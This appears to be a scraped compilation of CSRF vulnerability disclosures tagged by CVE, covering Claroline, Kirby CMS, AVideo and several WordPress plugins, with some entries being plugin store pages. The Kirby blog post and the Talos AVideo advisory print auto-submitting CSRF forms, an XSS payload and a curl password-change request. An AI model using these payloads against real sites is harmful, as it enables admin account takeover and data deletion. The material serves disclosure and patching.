Claroline 13.5.7 and prior allows an authenticated attacker to elevate privileges via the arbitrary creation of a privileged user. By combining the XSS vulnerability present in several upload forms and a javascript request to the present API, it is possible to trigger the creation of a user with administrative rights by opening an SVG file as an administrator user.

**Admin account takeover (CSRF) via XSS because of arbitrary file upload (version : 13.5.7)**

Claroline Connect is affected by a CSRF vulnerability, because of missing CSRF tokens or other protection means. This CSRF can be triggered via the Claroline's API, by combining an XSS vulnerability (like svg maybe ?) with a fetch request to the API. An arbitrary user with admin rights can be created by triggering the XSS from an admin user.

**Example of POC :**

**Fix suggest :** adding CSRF tokens or other protection way.

CVE-2022-37160: claroline-CVEs/csrf.md at main · matthieu-hackwitharts/claroline-CVEs

An issue was discovered in Kirby 2.5.12. The delete page functionality suffers from a CSRF flaw. A remote attacker can craft a malicious CSRF page and force the user to delete a page.

**Cross Site Request Forgery - Kirby CMS**

Cross Site Request Forgery - Kirby CMS  
By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.  
Title of the Vulnerability:  Stored XSS  
Vulnerability Class: Web Application Exploits.

**Technical Details & Description**: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.

CVE ID allocated: - Undisclosed.

**Product & Service Introduction**: Kirby CMS

**Steps to Re-Produce –**  
1.       Visit the application  
2.       Go to add page option  
3.       Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted  
4\. Payload:  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">  
      <input type="hidden" name="&#95;redirect" value="site&#47;subpages" />  
      <input type="submit" value="Submit request" />  
    </form>  
    <script>  
      document.forms\[0\].submit();  
    </script>  
  </body>  
</html>

**Exploitation Technique:** A attacker can inject perform severe actions including account takeover.  
**Severity Level**: High  
**Security Risk:**  
The presence of such a risk can lead to data loss,privilege escalation etc.

**Affected Product Version**:  Kirby 2.5.12  
**Solution - Fix & Patch:** The application code should be configured to implement anti csrf tokens.

POCs:

  

**Stored XSS - Kirby CMS**

By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Stored Cross Site Scripting

**Title of the Vulnerability**:  Stored XSS

**Vulnerability Class**: Web Application Exploits.

**Technical Details & Description**: The application allows user injected payload which can lead to Stored Cross Site Scripting.

CVE ID allocated: - Undisclosed.

Product & Service Introduction: Kirby CMS

Steps to Re-Produce –

1.       Visit the application

2.       Go to add page option

3.       Under title, enter any XSS payload like: <script>alert("XSS");</script>

4.       Upon the payload being injected, the subsequent page is triggered with XSS.

**Exploitation Technique**: A attacker can inject malicious xss payloads to steal user data.

**Severity Level**: High

**Security Risk**:

The presence of such a risk can lead to data loss, xss shell uploads etc

**Affected Product Version**:  Kirby 2.5.12

**Solution - Fix & Patch**: The application code should be configured to implement strict input validation to prevent XSS payloads.

POCs:

CVE-2018-14519: Zaran's Security Research Blog

Cross-Site Request Forgery (CSRF) leading to plugin settings update in YooMoney ?Kassa ??? WooCommerce plugin <= 2.3.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Важно**

Плагин «ЮKassa» разработан для WooCommerce 3.7 и выше.

The YooKassa plugin is compatible with WooCommerce version 3.7 or later.

**Описание**

Плагин «ЮKassa» – платежное решение для сайтов на WooCommerce:

*   включает 12 способов приема платежей,
*   подходит для юрлиц и ИП,
*   деньги поступают на банковский счет компании.

**Description**

The YooKassa plugin is the payment solution for websites that use WooCommerce:

*   includes 12 payment acceptance methods,
*   suitable for companies and entrepreneurs,
*   settlements are made to the company’s bank account.

**Настройка плагина**

Чтобы принимать платежи через плагин, нужно подать заявку на подключение ЮKassa и заключить договор с компанией «ЮMoney» (онлайн).  
После этого вы получите нужные настройки.  
Инструкция по установке и настройке плагина

**Plugin configuration**

To accept payments via the plugin, apply for onboarding with YooKassa and enter into a contract with YooMoney (online).  
We will send you the required settings afterwards.

**Поддержка передачи данных чека**  
Если вы настраивали отправку чеков в налоговую через партнеров ЮKassa (по 54-ФЗ), в настройках модуля надо включить отправку данных для чека.  
Помощь ЮKassa отправка чеков по 54-ФЗ

**We support the transmission of receipts**  
If you configured the transmission of receipts to the Tax service via YooKassa (in accordance with Federal Law No. 54-FZ), enable the transmission of receipt data in the settings.  
YooKassa’s guide for transmission of receipts in accordance with Federal Law No. 54-FZ

**Тарифы**

Подключение ЮKassa и настройка плагина – бесплатно. Комиссия за прием платежей – от 2,8%.  
Посмотреть все тарифы на сайте ЮKassa

**Rates**  
Onboarding with YooKassa and plugin configuration are free of charge. The commission for accepting payments starts at 2.8%.  
View all rates at the YooKassa website

**Все возможности ЮKassa**

После подключения ЮKassa доступны:  
\* 12 способов приема платежей. Карты, электронные кошельки, интернет-банки, сервисы онлайн-кредитования, наличные, баланс телефона. Вы сами выбираете, какие способы нужны, и перечисляете их в договоре. Кнопки оплаты можно разместить на своем сайте или на сайте ЮMoney: выберите подходящий вариант при настройке плагина.  
\* Личный кабинет на сайте ЮKassa. В нем можно делать возвраты платежей, выставлять и отправлять счета, общаться с менеджерами ЮKassa.

Перейти на сайт ЮKassa

**All features of YooKassa**

After the onboarding, you can access:

12 payment acceptance methods. Cards, e-wallets, online banking, installment plan services, cash, phone balance. Select the methods by yourself and specify them in the contract. You can place the payment buttons at your website or at the YooKassa website: choose the suitable option when setting up the plugin.  
Your own Merchant Profile at the YooKassa website. Use it to make refunds, create and send invoices, or contact the YooKassa manager.  
Visit the YooKassa website

Этот контора мошенники! Они вводят людей в заблуждение. После регистрации на юмони, вы не сможете принимать платежи. Они собирают о вас информацию и ни известно что потом с ней делают.

It is lightweight and work. Other not matter.

Read all 3 reviews

“ЮKassa для WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    yoomoney

**2.4.0**

*   Добавлен метод оплаты СБП с выбором на стороне сайта
*   Обновление SDK до версии 2.5.1

**2.3.3**

*   Исправлена ошибка повторной обработки уже полученных уведомлений от ЮKassa
*   Обновление SDK до 2.4.2

**2.3.2**

*   Добавлена возможность разрешать пользователям сохранять карту после успешной оплаты

**2.3.1**

*   Добавлена проверка роли пользователя при сохранении настроек (разрешено только administrator и manage\_woocommerce)
*   Добавлена проверка токена и сам токен в формах настроек для защиты от CSRF
*   Обновление SDK до 2.4.1

**2.3.0**

*   Добавлен способ авторизации в Юkassa через OAuth.
*   Добавлена подписка на уведомления через OAuth токен
*   Обновлен интерфейс настройки модуля
*   Добавлен перевод
*   Обновлен SDK до версии 2.3.0

**2.2.5**

*   Отключен способ оплаты Webmoney
*   Обновлен SDK до версии 2.2.6

**2.2.4**

*   Изменена инициализация виджета
*   Обновлен SDK до версии 2.2.5

**2.2.3**

*   Обновлен SDK до версии 2.2.2

**2.2.2**

*   Обновлен SDK до версии 2.1.8

**2.2.1**

*   Очистка корзины при оплате через виджет

**2.2.0**

*   Замена Сбербанк Онлайн на SberPay
*   Исправлена работа по очистке корзины
*   Добавлен файл переводов для en локали
*   Обновлен SDK до версии 2.1.7

**2.1.5**

*   Исправление конвертации стоимости товара и доставки

**2.1.4**

*   Курсы валют с учетом номинала
*   Обновлен SDK до версии 2.1.3

**2.1.3**

*   Заменён файл верификации для ApplePay

**2.1.2**

*   Поддержка сайтов без ЧПУ
*   Обновлен SDK до версии 2.1.2

**2.1.1**

*   Игнорируем заказы с другими платежными системами

**2.1.0**

*   Установка системы налогообложения
*   Исправлена ошибка пересчета кредитования при изменении способа доставки
*   Небольшие поправки
*   Обновлен SDK до версии 2.1.0

**2.0.4**

*   Поддержка плагина WPML при возврате с формы оплаты
*   Обновлен SDK до версии 2.0.7

**2.0.3**

*   Работа вкладок на странице настроек при конфликте bootstrap

**2.0.2**

*   Форматирование номера телефона для чеков
*   Обновлен SDK до версии 2.0.5

**2.0.1**

*   Сохранение всех попыток оплаты с привязкой к заказу

**2.0.0**

*   Публикация в магазине приложений

CVE-2022-36379: ЮKassa для WooCommerce

Cross-Site Request Forgery (CSRF) vulnerabilities in WPChill Gallery PhotoBlocks plugin <= 1.2.6 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of August 10, 2022 and is not available for download. This closure is temporary, pending a full review.

This is so good. Has a million options and does it all perfect.

It is so easy to use with the freedom to size every picture as you wish. I also like the lightbar, so visitors can watch your pictures full size. Really great!

Easy an flexible solution, a joy to work with!

Très bon plugin, intuitif et sympa. Je recommande

Ottimo plugin, facile da installare e pubblicare. Aspetto finale elegante

Read all 71 reviews

“Gallery PhotoBlocks” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2022-36292: Gallery PhotoBlocks

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

PSID 

d575770245ca

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-08-02

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities leading to stats and cache deletion were discovered by Vlad Vector (Patchstack) in the WordPress Download Manager plugin (versions <= 3.2.48).

**Solution**

Update the WordPress Download Manager plugin to the latest available version (at least 3.2.49).

**References**

CVE-2022-36288: WordPress Download Manager plugin <= 3.2.48 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

A cross-site request forgery (CSRF) vulnerability exists in WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to increased privileges. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site request forgery (CSRF) vulnerability exists in WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to increased privileges. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-352 - Cross-Site Request Forgery (CSRF)

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo lacks any Cross-Site Request Forgery protection across the whole application. This means that AVideo has no ability to make sure that a request is intentionally made by the user that performed it.

The simplest way to show how this can be exploited is via the password change feature. To change their own password, a logged-in user can make a request like the following:

    curl -k 'https://192.168.1.200/objects/userUpdate.json.php' \
      -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=123456;' \
      --data-raw 'user=admin&pass=newpass'
    

An attacker can trick an administrator into visiting a website that does that same request in the background, leading to a password change where the password is controlled by the attacker. A simple example of such a malicious page is the following:

    <form id='csrf' method='POST' action='https://192.168.1.200/objects/userUpdate.json.php'>
      <input type='hidden' name='user' value='admin'>
      <input type='hidden' name='pass' value='newpass'>
    </form>
    <script>document.getElementById("csrf").submit()</script>
    

Where 192.168.1.200 is more likely the hostname where the AVideo website is hosted. Such a page could be hosted on any attacker-controlled host. Once loaded it will just show a blank page; however, the POST request will automatically happen in the background. If the victim is logged into the AVideo website as administrator, their password will change into “newpass”.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-29468: TALOS-2022-1534 || Cisco Talos Intelligence Group

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Max Foundry MaxButtons plugin <= 9.2 at WordPress.

 Verified

 Fixed

**4.3**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 MaxButtons

Type

Plugin

Vulnerable versions

 <= 9.2

Fixed in

 9.3

PSID 

b82d75299e1a

CVE ID 

 CVE-2022-36346

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Credits

 Muhammad Daffa (Patchstack Alliance)

Publicly disclosed

2022-08-02

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by Muhammad Daffa (Patchstack Alliance) in WordPress MaxButtons plugin (versions <= 9.2).

**Solution**

Update the WordPress MaxButtons plugin to the latest available version (at least 9.3).

**References**

CVE-2022-36346: WordPress MaxButtons plugin <= 9.2 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in ThimPress WP Hotel Booking plugin <= 1.10.5 at WordPress.

 Verified

 Not fixed

**4.3**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 WP Hotel Booking

Type

Plugin

Vulnerable versions

<= 1.10.5

Fixed in

N/A

PSID 

0a7f6ee8db85

CVE ID 

 CVE-2021-36852

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Credits

 Ngo Van Thien (Alliance project)

Publicly disclosed

2022-08-02

**Details**

Cross-Site Request Forgery (CSRF) vulnerability discovered by Ngo Van Thien (Patchstack Alliance) in the WordPress WP Hotel Booking plugin (versions <= 1.10.5).

**Solution**

No patched version is available.

**References**

CVE-2021-36852: WordPress WP Hotel Booking plugin <= 1.10.5 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

The LinkWorth WordPress plugin before 3.3.4 does not implement nonce checks, which could allow attackers to make a logged in admin change settings via a CSRF attack.

CVE-2022-2172: Diff [2750802:2754739] for linkworth-wp-plugin – WordPress Plugin Repository

The Abandoned Cart Recovery for WooCommerce, Follow Up Emails, Newsletter Builder & Marketing Automation By Autonami WordPress plugin before 2.1.2 does not have authorisation and CSRF checks in one of its AJAX action, allowing any authenticated users, such as subscriber to create automations

Tag

#csrf